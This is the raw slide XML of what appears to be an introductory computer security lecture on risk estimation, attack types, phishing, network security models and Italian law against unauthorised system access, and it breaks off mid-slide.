            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>ISO 31000:2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Risk management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>ISO 2700X:2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titolo 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Risk estimate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Related image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D749F17F-388F-42D0-9BAF-1D366FD3D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25354"/>
            <a:ext cx="4089685" cy="600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16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Two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>perspectives</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Massive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>campaigns</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>victims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>among</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>millions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Targeted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>aim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/companies/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>perimeters</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Can exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2966056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Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of massive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>phishing</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>bluffs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>targeted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5378671D-167E-4DEC-876D-E8449F792383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="917848" y="2159003"/>
            <a:ext cx="7308304" cy="4394197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797037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PARANOID vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>unsecured</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> company = L</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>Estimated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> of security (new firewalls, etc.) = S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>uncontrolled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>programmers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>paranoidism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> = D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t>L &gt; S+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagramma 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5724128" y="4293096"/>
          <a:ext cx="2736304" cy="2376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7813"/>
            <a:ext cx="8534400" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Computer Security Challenges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8382000" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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not simple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consider potential attacks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procedures used counter-intuitive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involve algorithms and secret info</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decide where to deploy mechanisms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battle of wits between attacker / admin</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not perceived on benefit until fails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requires regular monitoring</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too often an after-thought</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regarded as impediment to using system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Passive Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Immagine 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1772816"/>
            <a:ext cx="8450767" cy="43614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533400"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD62B2D-1A05-44C8-9EAB-C1DFA844179E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3143051791"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="16002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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Active Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Immagine 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1772816"/>
            <a:ext cx="8496944" cy="43155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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Model for Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Immagine 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1700808"/>
            <a:ext cx="8297395" cy="4372347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396599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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Model for Network Access Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="400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61" y="2708920"/>
            <a:ext cx="8721358" cy="2971812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133501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rmAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>NO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>trespassing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> crime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>almost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>law</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>planet</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Art. 614 codice penale: chiunque s'introduce nell'abitazione altrui, o in un altro luogo di privata dimora, o nelle appartenenze di essi, contro la volontà espressa o tacita di chi ha il diritto di escluderlo, ovvero vi s'introduce clandestinamente o con inganno, è punito con la reclusione da sei mesi a tre anni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Art. 615 ter codice penale: chiunque abusivamente si introduce in un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0"/>
              <a:t>sistema informatico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0"/>
              <a:t>telematico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> protetto da misure di sicurezza ovvero vi si mantiene contro la volontà espressa o tacita di chi ha il diritto di escluderlo, è punito con la reclusione fino a tre anni. […]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titolo 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Issues: can I «check» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>else’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> system with no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996876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7DBF-B25D-426B-9846-22BC586579F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FAQ: Professional certifications</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB0F8E19-536D-47E6-ADD7-B63D0AF6A3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1695285"/>
            <a:ext cx="8229600" cy="532656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
